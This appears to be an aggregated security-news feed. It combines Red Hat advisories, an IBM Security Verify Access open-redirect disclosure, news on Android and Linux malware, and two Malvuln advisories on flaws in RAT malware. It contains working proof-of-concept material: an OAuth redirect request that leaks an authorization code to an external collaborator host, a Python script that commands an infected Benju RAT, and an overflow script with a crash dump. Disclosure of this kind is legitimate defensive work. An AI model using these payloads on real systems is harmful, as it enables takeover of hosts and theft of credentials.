Red Hat Security Advisory 2024-9472-03 - An update for grafana-pcp is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9472.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: grafana-pcp security updateAdvisory ID:        RHSA-2024:9472-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:9472Issue date:         2024-11-13Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for grafana-pcp is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-9472-03

Red Hat Security Advisory 2024-8847-03 - An update for grafana-pcp is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8847.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: grafana-pcp security updateAdvisory ID:        RHSA-2024:8847-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8847Issue date:         2024-11-05Revision:           03CVE Names:          CVE-2024-9355====================================================================Summary: An update for grafana-pcp is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.Security Fix(es):* golang-fips: Golang FIPS zeroed buffer (CVE-2024-9355)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9355References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2315719

Red Hat Security Advisory 2024-8847-03

IBM Security Verify Access versions prior to 10.0.8 suffer from authentication bypass, reuse of private keys, local privilege escalation, weak settings, outdated libraries, missing password, hardcoded secrets, remote code execution, missing authentication, null pointer dereference, and lack of privilege separation vulnerabilities.

IBM Security Verify Access 32 Vulnerabilities

Red Hat Security Advisory 2024-8534-03 - An update is now available for Red Hat Ansible Automation Platform 2.5. Issues addressed include cross site scripting and memory exhaustion vulnerabilities.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8534.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Ansible Automation Platform 2.5 Product Release UpdateAdvisory ID:        RHSA-2024:8534-03Product:            Red Hat Ansible Automation PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8534Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-10033====================================================================Summary: An update is now available for Red Hat Ansible Automation Platform 2.5Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.Security Fix(es):* automation-controller: Django: Memory exhaustion in django.utils.numberformat.floatformat() (CVE-2024-41989)* automation-controller: Django: Potential denial-of-service vulnerability in django.utils.html.urlize() (CVE-2024-45230)* automation-gateway: XSS on automation-gateway (CVE-2024-10033)* receptor: quic-go: memory exhaustion attack against QUIC's connection ID mechanism (CVE-2024-22189)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Updates and fixes included:* With this update, upgrades from Ansible Automation Platform 2.4 to 2.5 are supported for RPM and Operator-based deployments for Automation controller and Automation hub. For more information on how to upgrade, refer to the Upgrading section of the AAP landing page. (ANSTRAT-809)Container-based Ansible Automation Platform* The TLS Certificate Authority private key can now use a passphrase. (AAP-33594)* Automation hub is populated with container images (decision and execution environments) and Ansible collections. (AAP-33759)* The Automation controller, Event-Driven Ansible, and automation hub legacy UIs now display a redirect page to the Platform UI rather than a blank page. (AAP-33794)* Fixed the uninstall playbook execution when the environment was already uninstalled. (AAP-32981)* containerized installer setup has been updated to 2.5-3RPM-based Ansible Automation Platform* Added platform Redis to RPM-based Ansible Automation Platform. This allows a 6 node cluster for a Redis high availability (HA) deployment. (AAP-33773)* Removed the variable aap_caching_mtls and replaced it with redis_disable_tls and redis_disable_mtls which are boolean flags that disable Redis server TLS and Redis client certificate authentication. (AAP-33773)* An informative redirect page is now shown when going to automation controller, Event-Driven Ansible, or automation hub URL. (AAP-33827)* ansible-automation-platform-installer and installer setup have been updated to 2.5-4Additional changes:* automation-controller has been updated to 4.6.2* automation-eda-controller has been updated to 1.1.2* automation-gateway has been updated to 2.5.3* automation-hub/python3.11-galaxy-ng has been updated to 4.10.1* python3.11-django-ansible-base has been updated to 2.5.3* receptor has been updated to 1.4.9Solution:CVEs:CVE-2024-10033References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2273513https://bugzilla.redhat.com/show_bug.cgi?id=2302433https://bugzilla.redhat.com/show_bug.cgi?id=2314485https://bugzilla.redhat.com/show_bug.cgi?id=2319162

Red Hat Security Advisory 2024-8534-03

IBM Security Verify Access versions 10.0.0 through 10.0.8 suffer from an OAUTH related open redirection vulnerability.

- IBM Security Verify Access >= 10.0.0 <= 10.0.8 - Open Redirect during  
OAuth Flow

======== < Table of Contents >  
================================================

  0. Overview  
  1. Detailed Description  
  2. Proof Of Concept  
  3. Solution  
  4. Disclosure Timeline  
  5. References  
  6. Credits  
  7. Legal Notices

======== < 0. Overview >  
======================================================

  Revision:  
    1.0

  Impact:  
    By persuading a victim to visit a specially crafted Web site, a remote  
    attacker could exploit this vulnerability to spoof the URL displayed  
    to redirect a user to a malicious Web site that would appear to be  
    trusted. This could allow the attacker to obtain highly sensitive  
    information or conduct further attacks against the victim.

  Severity:  
    NIST: High  
    IBM: Medium

  CVSS Score:  
    NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)  
    IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

  CVE-ID:  
    CVE-2024-35133

  Vendor:  
    IBM

  Affected Products:  
    IBM Security Verify Access  
    IBM Security Verify Access Docker

  Affected Versions:  
    10.0.0 - 10.0.8

  Product Description:

    IBM Security Verify Access is a complete authorization and network  
    security policy management solution. It provides end-to-end protection  
    of resources over geographically dispersed intranets and extranets.

    In addition to state-of-the-art security policy management, IBM Security  
    Verify Access provides authentication, authorization, data security, and  
    centralized resource management capabilities.

    IBM Security Verify Access offers the following features:  
    Authentication ~ Provides a wide range of built-in authenticators and  
    supports external authenticators.

    Authorization ~ Provides permit and deny decisions for protected  
resources  
    requests in the secure domain through the authorization API.

    Data security and centralized resource management ~ Manages secure  
access  
    to private internal network-based resources by using the public  
Internet's  
    broad connectivity and ease of use with a corporate firewall system.

======== < 1. Detailed Description >  
==========================================

  During a Penetration Test of the OAuth flow for a client, it was found an  
  Open Redirect vulnerability that can led to the leakage of the OAuth  
"code" variable.

  It was possible to bypass the parser's logic responsible for verifying the  
  correctness and the validity of the "redirect_uri" parameter during an  
OAuth  
  flow by leveraging RFC 3986 (3.2.1) providing a username and password  
directly  
  in the Uniform Resource Identifier (URI).

  By providing as the "username" field a legitimate and expected domain, it  
  was possible to bypass the whitelist filter used by "IBM Security Verify  
Access"  
  and cause an Open Redirect to any arbitrary domain controlled by the  
attacker,  
  not only altering the expected flow and redirect a user to a malicious  
  Web site that would appear to be trusted.

  This could allow the attacker to obtain highly sensitive like the OAuth  
"code"  
  token or conduct further attacks against the victim

======== < 2. Proof of Concepts >  
=============================================

===== REQUEST =====

[[  
  GET  
/oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=  
https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+  
HTTP/1.1  
  Host: [REDACTED]  
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101  
Firefox/115.0  
  Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
  Accept-Language: en-US,en;q=0.5  
  Accept-Encoding: gzip, deflate, br  
  Upgrade-Insecure-Requests: 1  
  Sec-Fetch-Dest: document  
  Sec-Fetch-Mode: navigate  
  Sec-Fetch-Site: same-origin  
  Sec-Fetch-User: ?1  
  Te: trailers  
  Connection: close  
]]

===== RESPONSE =====

[[  
  HTTP/1.1 302 Found  
  content-language: en-US  
  date: Tue, 19 Mar 2024 16:04:35 GMT  
  location:  
https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]  
  p3p: CP="NON CUR OTPi OUR NOR UNI"  
  x-frame-options: DENY  
  x-content-type-options: nosniff  
  cache-control: no-store  
  x-xss-protection: 1; mode=block  
  x-permitted-cross-domain-policies: none  
  cross-origin-resource-policy: same-site  
  content-security-policy: frame-ancestors 'none'  
  referrer-policy: no-referrer-when-downgrade  
  strict-transport-security: max-age=31536000; includeSubDomains  
  pragma: no-cache  
  Content-Length: 0.  
]]

======== < 3. Solution >  
======================================================

  Refer to IBM Security Bulletin 7166712 for patch, upgrade or  
  suggested workaround information.

  See "References" for more details.

======== < 4. Disclosure Timeline >  
===========================================

  19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio  
Garzia)  
  21/03/2024 - Vulnerability shared with the client who committed the  
Penetration Test on his infrastructure, relying on IBM SVA  
  02/04/2024 - Vulnerability shared with IBM  
  02/04/2024 - Vulnerability taken over by IBM  
  14/05/2024 - Vulnerability confirmed by IBM  
  18/07/2024 - Pre-release provided by IBM to the customer to verify the  
resolution of the vulnerability  
  27/08/2024 - Security Bulletin and vulnerability shared by IBM

======== < 5. References >  
====================================================

  (1)  
https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133  
  (2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026  
  (3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133  
  (4) https://cwe.mitre.org/data/definitions/178.html

======== < 6. Credits >  
=======================================================

  This vulnerability was discovered and reported by:

    Giulio Garzia 'Ozozuz'

  Contacts:

    https://www.linkedin.com/in/giuliogarzia/  
    https://github.com/Ozozuz

======== < 7. Legal Notices >  
================================================

  Copyright (c) 2024 Giulio Garzia "Ozozuz"

  Permission is granted for the redistribution of this alert  
  electronically. It may not be edited in any way without mine express  
  written consent. If you wish to reprint the whole or any  
  part of this alert in any other medium other than electronically,  
  please email me for permission.

  Disclaimer: The information in the advisory is believed to be accurate  
  at the time of publishing based on currently available information.  
  Use of the information constitutes acceptance for use in an AS IS  
  condition.  
  There are no warranties with regard to this information. Neither the  
  author nor the publisher accepts any liability for any direct,  
  indirect, or consequential loss or damage arising from use of,  
  or reliance on,this information.

IBM Security Verify Access 10.0.8 Open Redirection

Discover DVa, a new tool that detects and removes malware exploiting accessibility features on Android devices. Learn how…

Discover DVa, a new tool that detects and removes malware exploiting accessibility features on Android devices. Learn how this innovative solution helps protect users from malicious apps and safeguards their personal information.

While accessibility features have greatly enhanced the usability of smartphones for people with disabilities, they have also introduced new vulnerabilities that malicious actors can exploit. The latest research reveals that malware can leverage these features to gain unauthorized access and perform harmful actions, such as transferring funds, compromising personal data, and preventing uninstallation.

For your information, accessibility (A11y) refers to the design and development of products, services, and environments used by people with disabilities. Common accessibility features include screen readers, voice-to-text software, captioning, keyboard navigation, and color contrast.

Accessibility permissions, designed for apps to interact with screen content and perform actions like reading text or clicking buttons, can be abused by malicious apps to execute actions without user consent, leading to severe consequences.

Screenshot: Georgia Tech

****DVa: A New Tool for Protection****

Researchers at Georgia Tech have developed a cloud-based tool called **Detector of Victim-specific Accessibility (DVa)** (PDF)to combat this growing threat. DVa scans Android devices for malware that exploits accessibility features and provides detailed reports to users and security researchers.

DVa is a backend service that analyzes malware detected by security systems like Google Play Protect. It tricks the malware into revealing its targets and attack methods by mimicking potential victim apps and simulating accessibility events.

This helps identify specific apps targeted by the malware and unique ways it abuses accessibility features, providing users with information about detected malware, affected apps, targeted victims, and potential damages.

Users can take immediate action to uninstall malicious apps and protect their devices. DVa sends reports to Google, enabling the company to address the issue and remove **malicious apps from the Play Store**.

DVa malware analysis technique dynamically models victim-specific A11y information, allowing investigators to access live interaction between the malware and this information. Researchers used it to analyze **Cerberus malware** and discovered an unknown automatic transaction abuse vector targeting 12 new victims and 0-day dynamically loaded routines targeting 12 additional victims.

The growing reliance on accessibility features highlights the need to balance usability and security. As systems become more accessible, it’s crucial to implement security measures to prevent malicious exploitation. Tools like DVa that provide users with necessary information, can help mitigate risks associated with accessibility-exploiting malware, ensuring a safer mobile experience for all.

1.  **Best Paid and Free OSINT Tools for 2024**
2.  **New tool detects fake 4G cell phone towers**
3.  **Mockingbird AI Tool Detects Deepfake Audio with 90% accuracy**
4.  **Fake OnlyFans Checker Tool Infects Hackers with Lummac Stealer**
5.  **Kaspersky’s iShutdown Tool Detects Pegasus Spyware on iOS Devices**

New Tool DVa Detects and Removes Android Malware

**What privileges could be gained by an attacker who successfully exploited the vulnerability?**

An attacker who successfully exploited this vulnerability could create or delete files in the security context of the “NT AUTHORITY\\ LOCAL SERVICE” account.

CVE-2024-43590: Visual C++ Redistributable Installer Elevation of Privilege Vulnerability

New Linux malware ‘Perfctl’ is targeting millions worldwide, mimicking system files to evade detection. This sophisticated malware compromises…

New Linux malware ‘Perfctl’ is targeting millions worldwide, mimicking system files to evade detection. This sophisticated malware compromises Linux servers, exploiting vulnerabilities for cryptomining and system resource hijacking.

Cybersecurity researchers at Aqua Nautilus have discovered a new Linux malware that has targeted millions worldwide, exploiting over 20,000 misconfigurations. The malware has been lurking for some time, but recently attacked a Nautilus honeypot, providing an opportunity to detect and examine this threat that can put any Linux server at risk.

According to Aqua Nautilus, this sophisticated Linux malware dubbed “perfctl” has been quietly targeting servers worldwide over the past few years. This highly persistent and evasive threat has been actively seeking vulnerabilities and misconfigurations to compromise systems.

The malware’s name comes from the cryptominer process, which drains system resources and causes significant issues for Linux developers. In the company’s technical research, shared exclusively with Hackread.com ahead of publishing on October 3 Thursday, there have been numerous incident reports and discussions in online communities pointing to the widespread prevalence of perfctl.

The malware’s impact has been felt across various developer forums, including Reddit, Stack Overflow, and others. “Usually in some of these posts, you can find replies with links to reports about the malware written by researchers. But in this case, however, none of these had links to such reports,” noted Assaf Morag and Idan Revivo in their research.

Another concerning trend highlighted by researchers is that Perfctl uses rootkits and evasion techniques to hide its presence from standard system tools and monitoring processes. It temporarily suspends its activities when new users log in, making it harder to detect. In addition, Perfctl uses Unix sockets for internal communication and the Tor network for external connections, making it difficult to track its activities.

The attack starts with the malware downloading a main payload from an attacker-controlled HTTP server controlled, named “httpd”. This payload has multiple layers of execution, ensuring persistence and evading detection. The malware copies itself to a new location, runs a new binary, terminates the original process, and deletes the initial binary.

It then executes the main payload under a different name, choosing the process’s name to appear less suspicious. The malware is executed by ‘sh’, changing its name from httpd to sh.

This malware gains persistence by self-replicating and using deceptive filenames that resemble legitimate system files. Perfctl copies itself to multiple locations on the disk, ensuring its survival even after system restarts or cleanups. 

Perfctl’s primary goal is cryptomining, using infected systems for cryptocurrency generation. It has also been observed engaging in proxy-jacking, and hijacking server resources for malicious purposes. Perfctl attempts to exploit the Polkit vulnerability (CVE-2021-4043) to gain root privileges, granting it greater access and control over the system.

Attack flow (Aqua Nautilus)

> _“Given the scale, we strongly believe the attackers targeted millions worldwide with a potential number of victims of thousands, it appears that with this malware any Linux server could be at risk.”_
> 
> Aqua Nautilus

Perfctl’s rootkit and evasion techniques make detection challenging, while its deceptive filenames and behaviour can make it appear legitimate. Its dynamic behaviour can also hinder detection efforts.

To protect your Linux systems from Perfctl, regularly update your operating system and software with the latest security patches, conduct vulnerability assessments, implement robust network security measures like firewalls and intrusion detection systems, monitor system activity for unusual behaviour, and use security tools like endpoint protection solutions.

1.  Telegram-Controlled TgRat Trojan Targets Linux Servers
2.  New Linux Malware “Migo” Exploits Redis for Cryptojacking
3.  Play Ransomware Variant Targeting Linux ESXi Environments
4.  Decade-Old Linux Vulnerability Used for DDoS Attacks on CUPS
5.  Mirai-based NoaBot Botnet Hits Linux Systems with Cryptominer

New Linux Malware ‘Perfctl’ Targets Millions by Mimicking System Files

Backdoor.Win32.Benju.a malware suffers from a remote command execution vulnerability.  This is the 700th release of a malvuln finding.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/88922242e8805bfbc5981e55fdfadd71.txtContact: malvuln13@gmail.comMedia: x.com/malvuln Threat: Backdoor.Win32.Benju.aVulnerability: Unauthenticated Remote Command ExecutionFamily: BenjuType: PE32MD5: 88922242e8805bfbc5981e55fdfadd71SHA256: 7d34804173e09d0f378dfc8c9212fe77ff51f08c9d0b73d00a19b7045ddc1f0e Vuln ID: MVID-2024-0700Disclosure: 09/27/2024Description: The RAT listens on TCP ports 200 and 15000. Third-party adversaries who can reach an infected host, can execute commands made available by the malware. Commands are sent in Spanish, using netcat or telnet fails to run cmds after connecting as they send CRLFs e.g. "quitar\r\n" fails "quitar" succeeds. Therefore, we need a custom client to send commands to the Benju RAT.Reiniciado = rebootquitar = terminate backdoorcerrarsesion = shutdownEnciendemonitor = turn on monitorapagamonitor = monitor offOcultaiconos = hide iconsactivachat = open chat windowBloquearaton = block ratDesbloquearaton = unblock ratActivainicio = activate startcerrarsesion = logoutOcultaiconosConectadoOcultado los iconoscerrarsesionConectadoCerrado la sesion de windowsEnciendemonitorConectadoMonitor encendidoapagamonitorConectadoMonitor apagadoquitarConectadoPc desinfectadoExploit/PoC:from socket import *import time,sysCMD=["Reiniciado","Enciendemonitor","apagamonitor","Ocultaiconos","Activainicio",          "activachat","Bloquearaton","Desbloquearaton","cerrarsesion","quitar"]def chk_res(s):    res=""    while True:        res += s.recv(512).decode()        if res:            break    return resdef Benju_Over(MALWARE_HOST, PTR):        PORT=200    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    print(CMD[PTR])    s.send("".encode())    print(chk_res(s))    PAYLOAD= CMD[PTR]   #Don't send CRLFs    s.send(PAYLOAD.encode())    time.sleep(0.5)    print(chk_res(s))    s.close()    print("[*] Benju (over) Rat PoC by malvuln")if __name__=="__main__":    c=-1    if len(sys.argv) < 3:        print("[+] Benju (over) Rat PoC by malvuln")        print("[+] Greetz Edu_Braun_0day, Indoushka, Todd J")        print("[!] Usage: Infected IP, Command")        print("[-]=============================")        for x in CMD:            c+=1            print("[+] "+str(c) + " "+ x)            exit()    try:        MALWARE_HOST=sys.argv[1]        PTR=int(sys.argv[2])        if MALWARE_HOST and PTR:            Benju_Over(MALWARE_HOST, PTR)    except Exception as e:        print("[!] "+str(e))        exit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Benju.a MVID-2024-0700 Remote Command Execution

Backdoor.Win32.Prorat.jz malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/277f9a4db328476300c4da5f680902ea.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln 

Threat: Backdoor.Win32.Prorat.jz  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The RAT listens on TCP ports 51100,5112,5110 and runs an FTP service. Prorat uses a vulnerable component in a secondary malware it drops on the victim system named "Netbot_Attacker VIP 6.0 Version korea.exe" MD5: 2168a606464c7fd016c260140a62815e. The dropped malware listens on TCP port 8080 and 80 on subsequent restarts. Third-party attackers who can reach an infected machine can send specially crafted sequential packetz to port 8080. This will trigger a stack buffer overflow overwriting the ECX, EIP registers and Structured Exception Handler (SEH).  
Family: Prorat  
Type: PE32  
MD5: 277f9a4db328476300c4da5f680902ea  
SHA256: 1134dffe52ea01f0d93a6889edd36620dbe9ee04224ad662e4f5463c4feb98a7   
Vuln ID: MVID-2024-0699  
Dropped files:  ~imsinst.exe, NetBot.ini  in  \AppData\Local\Temp directory.  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/27/2024

Memory Dump:  
(1974.354): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=00000000 esi=00000000 edi=00000002  
eip=76fced3c esp=0703f8d0 ebp=0703f910 iopl=0         nv up ei pl nz ac po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:008> .ecxr  
eax=00000000 ebx=04367000 ecx=41414141 edx=00000000 esi=04367000 edi=00406120  
eip=41414141 esp=0703ff80 ebp=0703ff94 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
41414141 ??              ???

0:008> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Netbot_Attacker VIP 6.0 Version korea.exe  
*** ERROR: Module load completed but symbols could not be loaded for Netbot_Attacker VIP 6.0 Version korea.exe

FAULTING_IP:   
+2f  
41414141 ??              ???

EXCEPTION_RECORD:  0703fad0 -- (.exr 0x703fad0)  
ExceptionAddress: 41414141  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000000  
   Parameter[1]: 41414141  
Attempt to read from address 41414141

PROCESS_NAME:  Netbot_Attacker VIP 6.0 Version korea.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAILED_INSTRUCTION_ADDRESS:   
+2f  
41414141 ??              ???

CONTEXT:  0703fb20 -- (.cxr 0x703fb20)  
eax=00000000 ebx=04367000 ecx=41414141 edx=00000000 esi=04367000 edi=00406120  
eip=41414141 esp=0703ff80 ebp=0703ff94 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
41414141 ??              ???  
Resetting default scope

READ_ADDRESS:  41414141 

FOLLOWUP_IP:   
+2f  
41414141 ??              ???

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 41414141 to 41414141

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN

IP_ON_HEAP:  41414141  
The fault address in not in any loaded module, please check your build's rebase  
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may  
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

FRAME_ONE_INVALID: 1

STACK_TEXT:    
00000000 00000000 unknown!netbot_attacker_vip_6.0_version_korea.exe+0x0

STACK_COMMAND:  .cxr 000000000703FB20 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  unknown!netbot_attacker_vip_6.0_version_korea.exe

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: unknown

IMAGE_NAME:  unknown

DEBUG_FLR_IMAGE_TIMESTAMP:  0

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_c0000409_unknown!Unloaded

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE_MISSING_GSFRAME_BAD_IP_unknown!netbot_attacker_vip_6.0_version_korea.exe

Followup: MachineOwner  
---------

0:008> !exchain  
0703f988: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *  
import time

MALWARE_HOST="x.x.x.x"  
PORT=8080  #80 after initial restart

def Prorat_BOF():

    print("[+] Backdoor.Win32.Prorat.jz")  
    print("[+] Remote Stack Buffer Overflow - SEH")  
    print("[+] MD5: 277f9a4db328476300c4da5f680902ea")

        for i in range(1, 13):  
        s=socket(AF_INET, SOCK_STREAM)  
        s.connect((MALWARE_HOST, PORT))  
        PAYLOAD="A"*100 * i  
        s.send(PAYLOAD.encode())  
        time.sleep(0.5)  
        print(len(PAYLOAD))  
        s.close()

if __name__=="__main__":  
    Prorat_BOF()  
    print("Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Tag

#redis